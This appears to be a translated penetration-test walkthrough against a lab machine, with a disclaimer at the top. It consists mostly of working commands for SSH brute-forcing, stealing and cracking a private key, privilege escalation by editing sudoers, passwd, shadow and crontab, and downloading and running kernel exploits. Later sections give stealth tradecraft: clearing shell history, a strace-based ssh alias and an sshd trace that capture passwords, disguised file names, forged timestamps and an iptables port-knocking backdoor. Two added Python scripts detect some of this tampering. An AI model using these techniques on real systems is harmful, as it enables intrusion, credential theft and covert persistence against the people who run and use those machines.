Disclaimer
This article is for technical discussion and learning only. Any direct or indirect consequences or losses caused by using the information it provides are the sole responsibility of the user; the author accepts no liability for them.
It is intended only for testing authorized targets; the author accepts no responsibility for tests against unauthorized targets, which is borne entirely by the person doing them.
Penetration test
Information gathering
Common nmap scans
Quick host discovery
nmap -sn 192.168.30.0/24
Identify the target IP
nmap -sV -p- --open 192.168.30.171
Vulnerability probing
Start with port 22
nmap -sV -sC -p 22 192.168.30.171
Hydra
This OpenSSH version has known historical vulnerabilities
CVE-2018-15473: an information disclosure vulnerability in OpenSSH 7.7 and earlier. The vulnerability stems from configuration and similar errors in the network system or product while it runs. An unauthenticated attacker can exploit it to obtain sensitive information from the affected component.
CVE-2016-6210: OpenSSH user enumeration vulnerability. The SSH daemon allows user enumeration through timing differences during authentication.
Username enumeration first
msfconsole -qx "use auxiliary/scanner/ssh/ssh_enumusers; set RHOSTS 192.168.30.171; set USER_FILE /home/kali/Desktop/top500.txt; exploit"
The root user is found; try weak passwords
Using rockyou.txt
hydra -l root -P /home/kali/Desktop/rockyou.txt ssh://192.168.30.171
Or brute-force usernames and passwords at the same time
hydra -L username.txt -P passwd.txt ssh://192.168.30.171
Or use tscanplus
Nothing is cracked; root probably has no weak password
No empty password either
Look at port 139
nmap -p 139 --script smb-vuln-* 192.168.30.171
nmblookup -A 192.168.30.171
nmap -p 139 --script smb-vuln-ms08-067 192.168.30.171
enum4linux -a 192.168.30.171
From the output we can see
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Nov 19 04:10:09 2025
=========================================( Target Information )=========================================
Target ........... 192.168.30.171
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.30.171 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 192.168.30.171 )===============================
Looking up status of 192.168.30.171
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
==================================( Session Check on 192.168.30.171 )==================================
[+] Server 192.168.30.171 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.30.171 )===============================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 192.168.30.171 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.30.171 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
======================================( Users on 192.168.30.171 )======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
================================( Share Enumeration on 192.168.30.171 )================================
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BASIC2
[+] Attempting to map shares on 192.168.30.171
//192.168.30.171/Anonymous Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.30.171/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 192.168.30.171 )===========================
[+] Attaching to 192.168.30.171 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BASIC2
[+] Builtin
[+] Password Info for Domain: BASIC2
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 192.168.30.171 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 192.168.30.171 via RID cycling (RIDS: 500-550,1000-1050) )=================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
==============================( Getting printer info for 192.168.30.171 )==============================
No printers returned.
Try connecting
smbclient //192.168.30.171/Anonymous -N
smbclient //192.168.30.171/Anonymous -U Jan
A null-password login works, but it is of little use
Exploitation with msf
msfconsole -qx "use exploit/linux/samba/is_known_pipename;set RHOST 192.168.30.171;set SMB_SHARE Anonymous;run"
All attempts fail; only the file staff.txt is found
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
These two users exist
Port 445
nmap --script smb* -p 445 192.168.30.171
Ports 8009/8080
Tool: Ghostcat-CNVD-2020-10487
python ajpShooter.py http://192.168.30.171:8080/ 8009 /WEB-INF/web.xml read
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to Tomcat
</description>
</web-app>
But reading any other file fails
Failed
python ajpShooter.py http://192.168.30.171:8080/ 8009 /WEB-INF/classes/test.class read -o a.txt
python ajpShooter.py http://192.168.30.171:18080/demo 8009 /a.txt eval
CVE-2025-24813
The PUT method is disabled; give up on this
Port 80
Directory scan with dirsearch
dirsearch -u http://192.168.30.171/
One result is found; view it
for J: ...and I was able to crack your hash really easily...
Cracking is only easy when the password is simple
Breaking in via SSH
Since kay and jan have been found and jan has a weak password, brute-force this user
Using rockyou.txt
gunzip /usr/share/wordlists/rockyou.txt.gz
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.30.171 -t 64
[22][ssh] host: 192.168.30.171 login: jan password: armando
Connect as jan
ssh jan@192.168.30.171
Connection succeeded; disable command history
HISTFILE=/dev/null HISTSIZE=0 HISTFILESIZE=0; set +o history; history -c
Try privilege escalation
No permissions; see who has sudo rights
cat /etc/group
kay has sudo rights; find a way to log in as kay
Look at the files
ls -la /home/kay
Look at kay's pass.bak file
cat pass.bak
No permission; look at the files in .ssh instead
cd .ssh
ls -la
We find user kay's .ssh directory, which contains authorized_keys, id_rsa (private key) and id_rsa.pub (public key), all of them readable
Copy the id_rsa file to the local machine
scp jan@192.168.30.171:/home/kay/.ssh/id_rsa .
Try logging in directly with the private key
# fix the key file permissions
chmod 600 id_rsa
# connect with the private key
ssh -i id_rsa kay@192.168.30.171
The key is encrypted; decrypt it
Decryption
Use ssh2john + John the Ripper
# convert the SSH private key into a format John can crack
ssh2john id_rsa > key.hash
# crack it with John
john --wordlist=rockyou.txt key.hash
# show the cracked password
john --show key.hash
ssh -i key kay@192.168.30.171
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Confirmed to be kay's password
hashcat
hashcat key rockyou.txt
Comparing the two, the first method is faster
Information gathering
Information gathering for privilege escalation
List the users that can log in
grep -E '/(bash|sh|zsh|csh|tcsh|ksh)$' /etc/passwd
List all superusers
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
Users with sudo rights
cat /etc/group
Check the permissions of passwd and shadow
ls -la /etc/passwd /etc/shadow
-rw-r--r-- 1 root root 1639 Apr 23 2018 /etc/passwd
-rw-r----- 1 root shadow 1182 Dec 3 03:43 /etc/shadow
/etc/passwd is readable by all users; /etc/shadow is readable by the shadow group
Check the distribution release
cat /etc/*-release
Check the kernel version
uname -a
Look for an exploit matching that version
Search for sensitive files; the open ports and the users that can log in help decide what to look for
find / -type f -name "*.bash_history" -o -name "*config*" -o -name "web.xml" -o -name "*database*" -o -name "*pass*" 2>/dev/null
Look for SUID files whose owner or group is root
When a SUID file is executed, the process gets the file owner's privileges
find / -type f -user root -perm -4000 -exec ls -la {} \; 2>/dev/null
find / -type f -user root -perm -4000 -exec ls -la {} + 2>/dev/null
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40152 Nov 30 2017 /bin/mount
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 27608 Nov 30 2017 /bin/umount
-rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 2437320 Nov 24 2016 /usr/bin/vim.basic
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 428240 Jan 18 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 85832 Nov 30 2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
Dangerous SUID files: any programming-language compiler, interpreter or editor
find nano vim more/less man cp mv awk sed curl wget cat nmap perl ruby gdb python
Look for SGID files
The process gets the privileges of the file's group
find / -type f -group root -perm -2000 -exec ls -la {} + 2>/dev/null
-rwsr-sr-x 1 root root 85832 Nov 30 2017 /usr/lib/snapd/snap-confine
General information gathering
Check open ports
netstat -antup
We can see that port 8005, which is not exposed externally, is listening; it can be used to shut down the Tomcat service
This command also works
ss -antup
First forward port 8005 to port 8888 on the local Linux host
ssh -L 0.0.0.0:8888:127.0.0.1:8005 jan@192.168.30.172 -N -f
Connect to port 8888 on the Linux host and issue the SHUTDOWN command to stop Tomcat
telnet 127.0.0.1 8888
Find machines on the same subnet
cat > /tmp/ps.sh << 'EOF' && chmod +x /tmp/ps.sh && /tmp/ps.sh
for i in {1..254}; do ping -c1 -W1 192.168.30.$i 2>/dev/null | grep "bytes from" & done; wait; echo "完成"
rm -f "$0"
EOF
echo 'for i in {1..254}; do ping -c1 -W1 192.168.30.$i 2>/dev/null | grep "bytes from" & done; wait; echo "完成"' > /tmp/scan.sh && chmod +x /tmp/scan.sh && /tmp/scan.sh && rm /tmp/scan.sh
arp -a
Backup files
find /etc /opt /root /home /tmp /srv /var /proc -readable -type f \( -name "*.bak" -o -name "*.gz" -o -name "*.zip" -o -name "*.tar" -o -name "*.tar.*" -o -name "*.rar" -o -name "*.sql" \) -exec ls -la {} + 2>/dev/null
find /etc /opt /root /home /tmp /srv /var /proc -readable -regex ".*\.\(bak\|gz\|zip\|tar\|tar\..*\)$" -exec ls -la {} + 2>/dev/null
Database files
find /etc /opt /root /home /tmp /srv /var /proc -readable -type f \( -name "*.sql" -o -name "*.dump" -o -name "*.db" -o -name "*.mdb" -o -name "*.mdf" -o -name "*.ndf" -o -name "*.ldf" \) -exec ls -la {} + 2>/dev/null
ssh
find /root /home -type f -readable \( -name "*id_ed*" -o -name "*id_rsa*" -o -name "*id_dsa*" -o -name "*known_hosts*" \) -exec ls -la {} + 2>/dev/null
Configuration files
find /etc /opt /root /home /tmp /srv /var /proc -type f \( -name "*.conf" -o -name "*.cfg" -o -name "*.ini" -o -name "*.yml" -o -name "*.yaml" -o -name "*.toml" -o -name "*.cnf" -o -name "*.json" -o -name "*.xml" -o -name "*config" \) -exec ls -la {} + 2>/dev/null
User history
find /root /home -type f -name "*.bash_history" -exec ls -la {} + 2>/dev/null
Firewall rules
iptables -L -n
Privilege escalation
sudo
Check whether escalation is possible
sudo -l
kay has full sudo rights
sudo su
Now we are root
ls /root or ls ~
Privilege escalation by editing files with vim
/usr/bin/vim.basic is found; commands can be executed through it
/usr/bin/vim.basic -c ':!/bin/sh'
This did not escalate privileges
/etc/sudoers
Add a line
vim -Es /etc/sudoers -c '$put =\"jan ALL=(ALL:ALL) NOPASSWD: ALL\"' -c 'wq!'
jan ALL=(ALL:ALL) NOPASSWD: ALL
Try escalating
sudo -i
cat /etc/sudoers | grep 'jan'
Comment it out or delete it
vim -Es /etc/sudoers -c '%s/^jan\s*ALL=(ALL:ALL) NOPASSWD: ALL/# &/' -c 'wq!'
vim -Es /etc/sudoers -c 'g/^jan\s*ALL=(ALL:ALL) NOPASSWD: ALL/d' -c 'wq!'
/etc/passwd
Generate a SHA-512 hash
openssl passwd -6 123456
$6$ZgXacSBCs5HE7DwU$zDFoTJ33vYJEhmhFjs2wQ2JAHCU1oe/ptommxhf344TQb1o8WukHgk8h5aYbNhO/oarlQQ1Q6dzsJtwM8TDDo.
Replace the "x" in the root entry directly with the hash
vim -Es -c '%s/^root:\zs[^:]*\ze:/$6$ZgXacSBCs5HE7DwU$zDFoTJ33vYJEhmhFjs2wQ2JAHCU1oe/ptommxhf344TQb1o8WukHgk8h5aYbNhO/oarlQQ1Q6dzsJtwM8TDDo./' -c 'wq!' /etc/passwd
vim -Es -c '%s/^root:\zs[^:]*\ze:/x/' -c 'wq!' /etc/passwd
Or add a hack user
vim -Es -c '$put =\"hack:$6$ZgXacSBCs5HE7DwU$zDFoTJ33vYJEhmhFjs2wQ2JAHCU1oe/ptommxhf344TQb1o8WukHgk8h5aYbNhO/oarlQQ1Q6dzsJtwM8TDDo.:0:0:root:/root:/bin/bash\"' -c 'wq!' /etc/passwd
su hack
Delete it after escalating
vim -Es -c 'g/^hack:.*/d' -c 'wq!' /etc/passwd
/etc/crontab
vim -Es /etc/crontab -c '$put =\"* * * * * root chmod +s /bin/bash\"' -c 'wq!'
That is, append at the end
* * * * * root chmod +s /bin/bash
After one minute the s bit is set; check the permissions
ls -l /bin/bash
Once the s bit is present, run
/bin/bash -p
The home directory here is still jan's
cd /root
cat flag.txt
/etc/shadow
Emptying the field only allows local escalation, but writing a password hash into it works
openssl passwd -6 jan
$6$W35moC99uXqmJ65H$JzEeUW4zq59NA6Uaa4R5FvFGJ1UVVmD4i8ZfUR85YHhie3u9a2WWtKX7eeTVXb4oCUdbn2hCUsFXqHFCPvNTq.
vim -Es -c '%s/^root:\zs[^:]*\ze:/$6$W35moC99uXqmJ65H$JzEeUW4zq59NA6Uaa4R5FvFGJ1UVVmD4i8ZfUR85YHhie3u9a2WWtKX7eeTVXb4oCUdbn2hCUsFXqHFCPvNTq./' -c 'wq!' /etc/shadow
If a password hash was put into /etc/passwd, the system still treats that one as valid and changes made in /etc/shadow have no effect
In the end the goal is to log in as root; if the file is readable, taking it away to crack is also an option
Show the file contents with vim
vim -Es +%p +q! /etc/shadow | grep 'root'
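An audit for the /etc/passwd and /etc/shadow changes described above, written here as an added example (it is not part of the original write-up): it flags extra UID 0 accounts, hashes placed directly in /etc/passwd (which the system honours before /etc/shadow, as noted above), and shadow hashes that differ from a saved baseline. The sample file contents and the baseline dictionary are constructed; on a real host, read the two files and a previously saved copy of /etc/shadow instead.

```python
import re

# Values in the /etc/passwd password field that mean "consult shadow" or "locked".
PASSWD_PLACEHOLDERS = {"x", "*", "!", "!!"}
# crypt(3) hash prefixes: md5, bcrypt, sha256, sha512, yescrypt.
HASH_RE = re.compile(r"^\$(1|2[aby]?|5|6|y)\$")


def audit_passwd(passwd_text):
    """Return (account, reason) findings for the text of /etc/passwd."""
    findings = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append((user, "extra UID 0 account"))
        if pw in PASSWD_PLACEHOLDERS:
            continue
        if HASH_RE.match(pw):
            # A hash here is used for login before /etc/shadow is consulted.
            findings.append((user, "password hash stored in /etc/passwd"))
        elif pw == "":
            findings.append((user, "empty password field"))
        else:
            findings.append((user, "unrecognised password field"))
    return findings


def audit_shadow(shadow_text, baseline):
    """Compare /etc/shadow hashes against a known-good snapshot {user: hash}."""
    findings = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw = fields[0], fields[1]
        if user not in baseline:
            findings.append((user, "account missing from baseline"))
        elif pw == "" and baseline[user] != "":
            findings.append((user, "shadow hash emptied"))
        elif pw != baseline[user]:
            findings.append((user, "shadow hash differs from baseline"))
    return findings


# Constructed sample content (not copied from any real host).
SAMPLE_PASSWD = """root:$6$constructed$notarealhash:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jan:x:1001:1001:,,,:/home/jan:/bin/bash
hack:$6$constructed$notarealhash:0:0:root:/root:/bin/bash
"""
SAMPLE_SHADOW = """root:$6$constructed$changedhash:19700:0:99999:7:::
jan:$6$constructed$janhash:19700:0:99999:7:::
"""
SAMPLE_BASELINE = {"root": "$6$constructed$originalhash", "jan": "$6$constructed$janhash"}

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) + audit_shadow(SAMPLE_SHADOW, SAMPLE_BASELINE):
        print("%-8s %s" % finding)
```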
Kernel privilege escalation
Scripts
https://github.com/liamg/traitor
https://github.com/The-Z-Labs/linux-exploit-suggester
https://github.com/jondonas/linux-exploit-suggester-2
https://github.com/belane/linux-soft-exploit-suggester
https://github.com/carlospolop/PEASS-ng
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/redcode-labs/Bashark
https://github.com/rebootuser/LinEnum
The second one is used below
Try to avoid running these at all; the kernel may crash outright
linux-exploit-suggester checks the environment for conditions that allow privilege escalation
Upload and run
scp linux-exploit-suggester/linux-exploit-suggester.sh jan@192.168.30.171:/tmp
Run the script
cd /tmp
./linux-exploit-suggester.sh
CVE-2017-16995
Look first at the vulnerabilities shown in brown, since they are only shown when the likelihood is high
Download
# with wget
wget --content-disposition https://www.exploit-db.com/download/45010
# with curl
curl -OJ https://www.exploit-db.com/download/45010
Static compile
gcc -pthread -static 45010.c -o 45010
Upload to the target machine
scp 45010 jan@192.168.30.171:/tmp
Run
./45010
Failed
Dirty COW
Download
curl -OJ https://www.exploit-db.com/download/40611
Compile
gcc -pthread -static 40611.c -o 40611
Copy into docker to compile; the docker_id is 79ce8d29d866
docker cp 40611.c 79ce8d29d866:/workspace
gcc -pthread 40611.c -o dirty -lcrypt
Generate the hash
openssl passwd -1 hack
$1$0.atYTn2$/7p3dNtGkXAJ./auK2z5.0
Upload the binary
scp 40611 jan@192.168.30.171:/tmp
Run it on the target host
./40611 /etc/passwd "hack:$1$0.atYTn2$/7p3dNtGkXAJ./auK2z5.0:0:0:root:/root:/bin/bash"
Failed
Dirty COW 2
curl -OJ https://www.exploit-db.com/download/40839
Compile in docker
gcc -pthread 40839.c -o 40839 -lcrypt
Upload and run
scp 40839 jan@192.168.30.172:/tmp
./40839
Enter the password 12345
su firefart
This one also fails
PwnKit
CVE-2021-4034
curl -OJ https://codeload.github.com/berdav/CVE-2021-4034/zip/main
unzip CVE-2021-4034-main.zip
cd CVE-2021-4034-main
Pull a docker image
Dodo docker image mirror site: docker.aityp.com/
Check the distribution release first
cat /etc/*-release
Given the x86_64 architecture seen earlier, choose amd64
Pull the image and run it
docker pull swr.cn-north-4.myhuaweicloud.com/ddn-k8s/docker.io/ubuntu:16.04
docker run -itd --restart=always \
-v /home/kali/uppower/exp/CVE-2021-4034-main/CVE-2021-4034-main:/workspace \
--name ubuntu \
swr.cn-north-4.myhuaweicloud.com/ddn-k8s/docker.io/ubuntu:16.04 \
/bin/bash
Run commands inside the container
apt update && apt install -y gcc
apt-get install make
Make sure the files are present
make
Remove the extra files
rm -r cve-2021-4034.* pwnkit.c README.md dry-run Makefile LICENSE
Upload the files from kali
scp -r CVE-2021-4034-main jan@192.168.30.171:/tmp
Run on the target host
cd CVE-2021-4034-main
./cve-2021-4034
Defense: apply the patch
CVE-2021-3156
First check for sudo rights
sudo -l
None, so it cannot be tested
CVE-2017-7308
curl -OJ https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
Compile in docker
gcc -o poc poc.c
Run
./poc
Failed
CVE-2017-6074
curl -OJ https://www.exploit-db.com/download/41458
gcc -o 41458 41458.c
./41458
If there is no response for a long time, watch the prompt and do not interrupt, or the kernel will crash
..............................................
CVE-2017-1000112
curl -OJ https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
gcc -o poc poc.c
This vulnerability needs kernel 4.11 to 4.11.5; according to uname -a the version is too old
CVE-2016-8655
curl -OJ https://www.exploit-db.com/download/40871
gcc 40871.c -o 40871 -pthread
Left for next time
CVE-2016-4557
curl -OJ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
apt install pkg-config libfuse-dev fuse
Run the compile script
./compile.sh
Upload
scp -r ebpf_mapfd_doubleput_exploit jan@192.168.30.172:/tmp
Run
cd ebpf_mapfd_doubleput_exploit
./doubleput
In the end only PwnKit succeeded, so prioritize privilege-escalation vulnerabilities that are likely and were disclosed long after the target's version was released
Internal lateral movement
The earlier search for sensitive information is part of this, as is cracking the passwords in /etc/shadow
Capture the traffic of SSH connections initiated locally
vim -Es ~/.bashrc -c "norm G" -c "norm oalias ssh='strace -o /tmp/.sshpwd-\`date '+%d%h%m%s'\`.log -e read,write,connect -s2048 ssh'" -c "wq!"
Or
echo "alias ssh='strace -o /tmp/.sshpwd-\`date '+%d%h%m%s'\`.log -e read,write,connect -s2048 ssh'" >/tmp/toor;vim -Es -c '$r /tmp/toor' -c 'wq!' ~/.bashrc;rm /tmp/toor
Activate the newly added alias
source ~/.bashrc
Traffic from SSH connections initiated on the target is then recorded
Output only the wanted results
grep -E '^write\(4, "[^"]*password[^"]*".*=|^read\(4, "[[:alnum:]\\]*", 1\)|^write\(4, "\\\\n", 1\)' /tmp/.sshpwd-*.log
Keystroke extraction
grep -E '^write\(4, "[^"]+@[^"]*'"'"'s password: ".*=|^read\(4, "."|^write\(4, "\\\\n"' /tmp/.sshpwd-*.log
Removal: find the line and delete it
vim -Es ~/.bashrc -c 'g/alias ssh.*strace/d' -c 'wq!'
Capture inbound SSH traffic
Check process relationships
Find sshd-related processes in the process tree and show two lines of context before and after each match
pstree -ap | grep -A 2 -B 2 sshd
Trace the main sshd process
strace -f -p 1148 -o /tmp/.ssh.log -e trace=read,write,connect -s 2048
Extract the password
grep -oP '\\\\f\\\\0\\\\0\\\\0\\\\[0-9]{1,3}[a-zA-Z0-9_]+' /tmp/.ssh.log
Keystroke logging
awk '/write.*= 1$|write.*= 2$|write.*= 3$/ {print $0}' /tmp/.ssh.log
awk '/write.*= [123]$/ {match($0, /"([^"]+)"/, a); printf "%s", a[1]} END{print ""}' /tmp/.ssh.log
Persistence
Hiding files
Ordinary hiding
mv test.txt .test.txt
setfattr -n "user.hidden" -v 1 .ssh.log
getfattr .ssh.log
Create a file whose name looks like an argument
When rm -- is run, rm takes it for an option such as rm --help, i.e. it assumes the user mistyped an argument
echo "test" > --
The file can even be named --help, -rf or another rm option
Deleting it with an absolute or relative path works, because rm then no longer reads ./-- as an option but as a file
rm ./--
rm /tmp/--
Put the file among the permanent entries in /tmp, alongside things like .font-unix and .ICE-unix
Hiding file timestamps
Give webshell.php the timestamp of index.php
touch -r hsperfdata_tomcat9 ./--help
Specify a timestamp
touch -t 202512110810.20 ./ts -c
# -c: do not create the file if it does not exist
But
ls -la --full-time
The time shown by this command makes the --help file stand out at a glance
So -d should be used for more precision
touch -d "2025-12-10 06:24:39.067830158" ./--help -c
It is still flawed, though: stat can show the last change time
stat ./--help
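An added example (not from the original write-up) of the defender-side check the stat remark above implies: touch -d, -t and -r rewrite atime and mtime, but the kernel always sets ctime to the moment of the change, so a ctime well after mtime gives the forgery away; the scan also flags names that start with '-'. The demo() directory and its two files are constructed, and the one-year-old mtime is an assumed value.

```python
import os
import tempfile
import time


def timestamp_findings(path, tolerance=2.0):
    """Return the reasons a file's name or timestamps look forged.

    touch -d / -t / -r change atime and mtime but never ctime, which the kernel
    updates to "now"; a ctime much newer than mtime means the times were rewritten
    (or other metadata changed) after the last real write.
    """
    st = os.lstat(path)
    reasons = []
    if os.path.basename(path).startswith("-"):
        reasons.append("name starts with '-' (rm/ls option look-alike)")
    if st.st_ctime - st.st_mtime > tolerance:
        reasons.append("ctime %.0f is newer than mtime %.0f" % (st.st_ctime, st.st_mtime))
    return reasons


def scan_dir(directory, tolerance=2.0):
    """Walk a directory tree; return {path: reasons} for every suspicious file."""
    out = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            reasons = timestamp_findings(path, tolerance)
            if reasons:
                out[path] = reasons
    return out


def demo():
    """Constructed directory: one honest file and one '--help' back-dated the way touch -d does."""
    d = tempfile.mkdtemp()
    honest = os.path.join(d, "index.php")
    forged = os.path.join(d, "--help")
    for p in (honest, forged):
        with open(p, "w") as fh:
            fh.write("<?php ?>\n")
    old = time.time() - 365 * 86400          # assumed: pretend the file is a year old
    os.utime(forged, (old, old))             # moves atime/mtime only; ctime stays "now"
    return {os.path.basename(p): r for p, r in scan_dir(d).items()}


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, "->", "; ".join(reasons))
```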
Hiding permissions
Lock a file
chattr +i ./-rf
# remove the lock
chattr -i ./-rf
Make a directory append-only
mkdir test
chattr +a test
# remove
chattr -a test
View the attributes
lsattr ./-rf
Hiding command history was covered earlier and is not repeated here
Hiding ports
Using iptables
On the target machine
# 1. create the port-reuse chain
iptables -t nat -N LETMEIN
# port-reuse rule
iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22
# "open" switch; added to the filter table by default, so no table needs to be given
iptables -A INPUT -p tcp --dport 81 -m recent --set --name letmein --rsource -j ACCEPT
# "close" switch, as above
iptables -A INPUT -p tcp --dport 82 -m recent --name letmein --remove -j ACCEPT
# main rule
iptables -t nat -A PREROUTING -p tcp --dport 80 -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
Parameter explanation
append -A / delete -D / list -L / new -N / jump -j / match -m / table -t / protocol -p / destination port --dport / record source --rsource
On the machine initiating the connection
Open
curl http://192.168.30.172:81
Close
curl http://192.168.30.172:82
Removing the added rules
View the PREROUTING chain of the nat table with line numbers
iptables -t nat -L PREROUTING -n --line-numbers
View the INPUT chain of the filter table; without -t the filter table is the default
iptables -L INPUT -n --line-numbers
Confirm these are the rules that were added
Delete rule 1 of the nat table's PREROUTING chain
iptables -t nat -D PREROUTING 1
Delete rules 1 and 2 of the filter table's INPUT chain
# after rule 1 is deleted, rule 2 becomes rule 1, so delete rule 2 first
iptables -D INPUT 2
iptables -D INPUT 1
# or run the command below twice
